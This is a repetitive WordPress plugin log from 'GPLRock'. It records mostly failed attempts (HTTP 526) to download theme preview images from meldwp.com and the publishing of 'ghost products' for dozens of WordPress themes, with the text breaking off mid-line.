Error: . Retrying... [05-Apr-2026 03:58:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sara---woocommerce-wordpress-market-theme-22335.webp for product sara-woocommerce-wordpress-market-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:09 UTC] GPLRock: Image download failed for product sara-woocommerce-wordpress-market-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:11 UTC] GPLRock: Image download failed for product sara-woocommerce-wordpress-market-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sara---woocommerce-wordpress-market-theme-22335.webp for product sara-woocommerce-wordpress-market-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:13 UTC] GPLRock WARNING: Image download failed for product sara-woocommerce-wordpress-market-theme. URL: https://meldwp.com/wp-content/uploads/sara---woocommerce-wordpress-market-theme-22335.webp [05-Apr-2026 03:58:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sara-woocommerce-wordpress-market-theme [05-Apr-2026 03:58:13 UTC] GPLRock: Image download failed for product vasco-a-daring-wordpress-travel-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:15 UTC] GPLRock: Image download failed for product vasco-a-daring-wordpress-travel-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vasco---a-daring-wordpress-travel-blog-theme-8106.webp for product vasco-a-daring-wordpress-travel-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:18 UTC] GPLRock: Image download failed for product vasco-a-daring-wordpress-travel-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:20 UTC] GPLRock: Image download failed for product vasco-a-daring-wordpress-travel-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vasco---a-daring-wordpress-travel-blog-theme-8106.webp for product vasco-a-daring-wordpress-travel-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:22 UTC] GPLRock WARNING: Image download failed for product vasco-a-daring-wordpress-travel-blog-theme. URL: https://meldwp.com/wp-content/uploads/vasco---a-daring-wordpress-travel-blog-theme-8106.webp [05-Apr-2026 03:58:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vasco-a-daring-wordpress-travel-blog-theme [05-Apr-2026 03:58:22 UTC] GPLRock: Image download failed for product woncep-fashion-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:24 UTC] GPLRock: Image download failed for product woncep-fashion-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woncep---fashion-woocommerce-wordpress-theme-5076.webp for product woncep-fashion-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:26 UTC] GPLRock: Image download failed for product woncep-fashion-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:29 UTC] GPLRock: Image download failed for product woncep-fashion-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woncep---fashion-woocommerce-wordpress-theme-5076.webp for product woncep-fashion-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:31 UTC] GPLRock WARNING: Image download failed for product woncep-fashion-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/woncep---fashion-woocommerce-wordpress-theme-5076.webp [05-Apr-2026 03:58:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woncep-fashion-woocommerce-wordpress-theme [05-Apr-2026 03:58:31 UTC] GPLRock: Image download failed for product salvation-church-religion-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:33 UTC] GPLRock: Image download failed for product salvation-church-religion-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/salvation---church--religion-wp-theme-11025.webp for product salvation-church-religion-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:35 UTC] GPLRock: Image download failed for product salvation-church-religion-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:37 UTC] GPLRock: Image download failed for product salvation-church-religion-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/salvation---church--religion-wp-theme-11025.webp for product salvation-church-religion-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:39 UTC] GPLRock WARNING: Image download failed for product salvation-church-religion-wp-theme. URL: https://meldwp.com/wp-content/uploads/salvation---church--religion-wp-theme-11025.webp [05-Apr-2026 03:58:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: salvation-church-religion-wp-theme [05-Apr-2026 03:58:40 UTC] GPLRock: Image download failed for product mireya-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:42 UTC] GPLRock: Image download failed for product mireya-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mireya---interior-design-wordpress-theme-20961.webp for product mireya-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:44 UTC] GPLRock: Image download failed for product mireya-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:46 UTC] GPLRock: Image download failed for product mireya-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mireya---interior-design-wordpress-theme-20961.webp for product mireya-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:48 UTC] GPLRock WARNING: Image download failed for product mireya-interior-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mireya---interior-design-wordpress-theme-20961.webp [05-Apr-2026 03:58:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mireya-interior-design-wordpress-theme [05-Apr-2026 03:58:49 UTC] GPLRock: Image download failed for product ncmaz-news-magazine-full-site-editing-wordpress-block-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:51 UTC] GPLRock: Image download failed for product ncmaz-news-magazine-full-site-editing-wordpress-block-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ncmaz---news-magazine-full-site-editing-wordpress-block-theme-16182.webp for product ncmaz-news-magazine-full-site-editing-wordpress-block-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:53 UTC] GPLRock: Image download failed for product ncmaz-news-magazine-full-site-editing-wordpress-block-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:55 UTC] GPLRock: Image download failed for product ncmaz-news-magazine-full-site-editing-wordpress-block-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ncmaz---news-magazine-full-site-editing-wordpress-block-theme-16182.webp for product ncmaz-news-magazine-full-site-editing-wordpress-block-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:57 UTC] GPLRock WARNING: Image download failed for product ncmaz-news-magazine-full-site-editing-wordpress-block-theme. URL: https://meldwp.com/wp-content/uploads/ncmaz---news-magazine-full-site-editing-wordpress-block-theme-16182.webp [05-Apr-2026 03:58:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ncmaz-news-magazine-full-site-editing-wordpress-block-theme [05-Apr-2026 03:58:57 UTC] GPLRock: Image download failed for product solida-solar-renewable-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:59 UTC] GPLRock: Image download failed for product solida-solar-renewable-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/solida---solar--renewable-energy-wordpress-theme-2774.webp for product solida-solar-renewable-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:59:02 UTC] GPLRock: Image download failed for product solida-solar-renewable-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:04 UTC] GPLRock: Image download failed for product solida-solar-renewable-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/solida---solar--renewable-energy-wordpress-theme-2774.webp for product solida-solar-renewable-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:59:06 UTC] GPLRock WARNING: Image download failed for product solida-solar-renewable-energy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/solida---solar--renewable-energy-wordpress-theme-2774.webp [05-Apr-2026 03:59:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: solida-solar-renewable-energy-wordpress-theme [05-Apr-2026 03:59:06 UTC] GPLRock: Image downloaded successfully for product legrand-modern-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-545c675d.webp [05-Apr-2026 03:59:06 UTC] GPLRock: Using pre-downloaded image for product legrand-modern-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-545c675d.webp [05-Apr-2026 03:59:06 UTC] GPLRock: Ghost product published with image - Product ID: legrand-modern-business-wordpress-theme [05-Apr-2026 03:59:30 UTC] GPLRock: Image download failed for product harizma-modern-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:32 UTC] GPLRock: Image download failed for product harizma-modern-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/harizma--modern-creative-agency-wordpress-theme-18695.webp for product harizma-modern-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:59:35 UTC] GPLRock: Image download failed for product harizma-modern-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:37 UTC] GPLRock: Image download failed for product harizma-modern-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/harizma--modern-creative-agency-wordpress-theme-18695.webp for product harizma-modern-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:59:39 UTC] GPLRock WARNING: Image download failed for product harizma-modern-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/harizma--modern-creative-agency-wordpress-theme-18695.webp [05-Apr-2026 03:59:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: harizma-modern-creative-agency-wordpress-theme [05-Apr-2026 03:59:39 UTC] GPLRock: Image download failed for product dreamhome-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:41 UTC] GPLRock: Image download failed for product dreamhome-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dreamhome---real-estate-wordpress-theme-4414.webp for product dreamhome-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:59:43 UTC] GPLRock: Image download failed for product dreamhome-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:45 UTC] GPLRock: Image download failed for product dreamhome-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dreamhome---real-estate-wordpress-theme-4414.webp for product dreamhome-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:59:47 UTC] GPLRock WARNING: Image download failed for product dreamhome-real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dreamhome---real-estate-wordpress-theme-4414.webp [05-Apr-2026 03:59:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dreamhome-real-estate-wordpress-theme [05-Apr-2026 03:59:48 UTC] GPLRock: Image download failed for product right-candidate-election-campaign-and-political-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:50 UTC] GPLRock: Image download failed for product right-candidate-election-campaign-and-political-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/right-candidate---election-campaign-and-political-wordpress-theme-18152.webp for product right-candidate-election-campaign-and-political-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:59:52 UTC] GPLRock: Image download failed for product right-candidate-election-campaign-and-political-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:54 UTC] GPLRock: Image download failed for product right-candidate-election-campaign-and-political-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/right-candidate---election-campaign-and-political-wordpress-theme-18152.webp for product right-candidate-election-campaign-and-political-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:59:56 UTC] GPLRock WARNING: Image download failed for product right-candidate-election-campaign-and-political-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/right-candidate---election-campaign-and-political-wordpress-theme-18152.webp [05-Apr-2026 03:59:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: right-candidate-election-campaign-and-political-wordpress-theme [05-Apr-2026 03:59:56 UTC] GPLRock: Image downloaded successfully for product book-store-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82321f2d.webp [05-Apr-2026 03:59:56 UTC] GPLRock: Using pre-downloaded image for product book-store-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82321f2d.webp [05-Apr-2026 03:59:56 UTC] GPLRock: Ghost product published with image - Product ID: book-store-wordpress-theme [05-Apr-2026 03:59:56 UTC] GPLRock: Image download failed for product rentacar-car-rental-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:59:59 UTC] GPLRock: Image download failed for product rentacar-car-rental-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rentacar---car-rental--listing-wordpress-theme-23461.webp for product rentacar-car-rental-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:00:01 UTC] GPLRock: Image download failed for product rentacar-car-rental-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:03 UTC] GPLRock: Image download failed for product rentacar-car-rental-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rentacar---car-rental--listing-wordpress-theme-23461.webp for product rentacar-car-rental-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:00:05 UTC] GPLRock WARNING: Image download failed for product rentacar-car-rental-listing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rentacar---car-rental--listing-wordpress-theme-23461.webp [05-Apr-2026 04:00:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rentacar-car-rental-listing-wordpress-theme [05-Apr-2026 04:00:05 UTC] GPLRock: Image download failed for product merge-personal-portfolio-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:15 UTC] GPLRock: Image download failed for product merge-personal-portfolio-resume-wordpress-theme (attempt 2/3). HTTP Code: 525, Error: . Retrying... [05-Apr-2026 04:00:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/merge---personal-portfolio--resume-wordpress-theme-16412.webp for product merge-personal-portfolio-resume-wordpress-theme after 3 attempts. HTTP Code: 521, Error: [05-Apr-2026 04:00:17 UTC] GPLRock: Image download failed for product merge-personal-portfolio-resume-wordpress-theme (attempt 1/3). HTTP Code: 521, Error: . Retrying... [05-Apr-2026 04:00:20 UTC] GPLRock: Image download failed for product merge-personal-portfolio-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/merge---personal-portfolio--resume-wordpress-theme-16412.webp for product merge-personal-portfolio-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:00:22 UTC] GPLRock WARNING: Image download failed for product merge-personal-portfolio-resume-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/merge---personal-portfolio--resume-wordpress-theme-16412.webp [05-Apr-2026 04:00:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: merge-personal-portfolio-resume-wordpress-theme [05-Apr-2026 04:00:22 UTC] GPLRock: Image download failed for product charito-nonprofit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:24 UTC] GPLRock: Image download failed for product charito-nonprofit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charito---nonprofit-charity-wordpress-theme-32811.webp for product charito-nonprofit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:00:26 UTC] GPLRock: Image download failed for product charito-nonprofit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:28 UTC] GPLRock: Image download failed for product charito-nonprofit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charito---nonprofit-charity-wordpress-theme-32811.webp for product charito-nonprofit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:00:30 UTC] GPLRock WARNING: Image download failed for product charito-nonprofit-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/charito---nonprofit-charity-wordpress-theme-32811.webp [05-Apr-2026 04:00:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: charito-nonprofit-charity-wordpress-theme [05-Apr-2026 04:00:30 UTC] GPLRock: Image downloaded successfully for product knowbase-a-helpdesk-bbpress-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c7e5331a.webp [05-Apr-2026 04:00:30 UTC] GPLRock: Using pre-downloaded image for product knowbase-a-helpdesk-bbpress-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c7e5331a.webp [05-Apr-2026 04:00:30 UTC] GPLRock: Ghost product published with image - Product ID: knowbase-a-helpdesk-bbpress-wordpress-theme [05-Apr-2026 04:00:31 UTC] GPLRock: Image download failed for product xpovio-creative-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:33 UTC] GPLRock: Image download failed for product xpovio-creative-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xpovio---creative-digital-agency-wordpress-theme-5626.webp for product xpovio-creative-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:00:35 UTC] GPLRock: Image download failed for product xpovio-creative-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:37 UTC] GPLRock: Image download failed for product xpovio-creative-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xpovio---creative-digital-agency-wordpress-theme-5626.webp for product xpovio-creative-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:00:39 UTC] GPLRock WARNING: Image download failed for product xpovio-creative-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/xpovio---creative-digital-agency-wordpress-theme-5626.webp [05-Apr-2026 04:00:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xpovio-creative-digital-agency-wordpress-theme [05-Apr-2026 04:00:39 UTC] GPLRock: Image download failed for product redy-marathon-running-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:41 UTC] GPLRock: Image download failed for product redy-marathon-running-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/redy--marathon--running-sports-wordpress-theme-18981.webp for product redy-marathon-running-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:00:44 UTC] GPLRock: Image download failed for product redy-marathon-running-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:46 UTC] GPLRock: Image download failed for product redy-marathon-running-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:00:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/redy--marathon--running-sports-wordpress-theme-18981.webp for product redy-marathon-running-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:00:48 UTC] GPLRock WARNING: Image download failed for product redy-marathon-running-sports-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/redy--marathon--running-sports-wordpress-theme-18981.webp [05-Apr-2026 04:00:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: redy-marathon-running-sports-wordpress-theme [05-Apr-2026 04:01:02 UTC] GPLRock: Image download failed for product elson-modern-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:04 UTC] GPLRock: Image download failed for product elson-modern-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elson---modern-shop-wordpress-theme-20481.webp for product elson-modern-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:06 UTC] GPLRock: Image download failed for product elson-modern-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:08 UTC] GPLRock: Image download failed for product elson-modern-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elson---modern-shop-wordpress-theme-20481.webp for product elson-modern-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:11 UTC] GPLRock WARNING: Image download failed for product elson-modern-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/elson---modern-shop-wordpress-theme-20481.webp [05-Apr-2026 04:01:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elson-modern-shop-wordpress-theme [05-Apr-2026 04:01:11 UTC] GPLRock: Image download failed for product leadgen-multipurpose-marketing-landing-page-pack-with-html-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:13 UTC] GPLRock: Image download failed for product leadgen-multipurpose-marketing-landing-page-pack-with-html-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/leadgen---multipurpose-marketing-landing-page-pack-with-html-builder-21725.webp for product leadgen-multipurpose-marketing-landing-page-pack-with-html-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:15 UTC] GPLRock: Image download failed for product leadgen-multipurpose-marketing-landing-page-pack-with-html-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:17 UTC] GPLRock: Image download failed for product leadgen-multipurpose-marketing-landing-page-pack-with-html-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/leadgen---multipurpose-marketing-landing-page-pack-with-html-builder-21725.webp for product leadgen-multipurpose-marketing-landing-page-pack-with-html-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:19 UTC] GPLRock WARNING: Image download failed for product leadgen-multipurpose-marketing-landing-page-pack-with-html-builder. URL: https://meldwp.com/wp-content/uploads/leadgen---multipurpose-marketing-landing-page-pack-with-html-builder-21725.webp [05-Apr-2026 04:01:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: leadgen-multipurpose-marketing-landing-page-pack-with-html-builder [05-Apr-2026 04:01:19 UTC] GPLRock: Image download failed for product haney-beekeeping-and-honey-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:22 UTC] GPLRock: Image download failed for product haney-beekeeping-and-honey-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/haney---beekeeping-and-honey-shop-theme-6312.webp for product haney-beekeeping-and-honey-shop-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:24 UTC] GPLRock: Image download failed for product haney-beekeeping-and-honey-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:26 UTC] GPLRock: Image download failed for product haney-beekeeping-and-honey-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/haney---beekeeping-and-honey-shop-theme-6312.webp for product haney-beekeeping-and-honey-shop-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:28 UTC] GPLRock WARNING: Image download failed for product haney-beekeeping-and-honey-shop-theme. URL: https://meldwp.com/wp-content/uploads/haney---beekeeping-and-honey-shop-theme-6312.webp [05-Apr-2026 04:01:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: haney-beekeeping-and-honey-shop-theme [05-Apr-2026 04:01:28 UTC] GPLRock: Image download failed for product apptek-app-saas-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:30 UTC] GPLRock: Image download failed for product apptek-app-saas-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/apptek---app--saas-theme-12671.webp for product apptek-app-saas-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:32 UTC] GPLRock: Image download failed for product apptek-app-saas-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:35 UTC] GPLRock: Image download failed for product apptek-app-saas-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:01:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/apptek---app--saas-theme-12671.webp for product apptek-app-saas-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:01:37 UTC] GPLRock WARNING: Image download failed for product apptek-app-saas-theme. URL: https://meldwp.com/wp-content/uploads/apptek---app--saas-theme-12671.webp [05-Apr-2026 04:01:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: apptek-app-saas-theme [05-Apr-2026 04:01:37 UTC] GPLRock: Image downloaded successfully for product aroland-single-property-landing-page-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e60e33c.webp [05-Apr-2026 04:01:37 UTC] GPLRock: Using pre-downloaded image for product aroland-single-property-landing-page-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e60e33c.webp [05-Apr-2026 04:01:37 UTC] GPLRock: 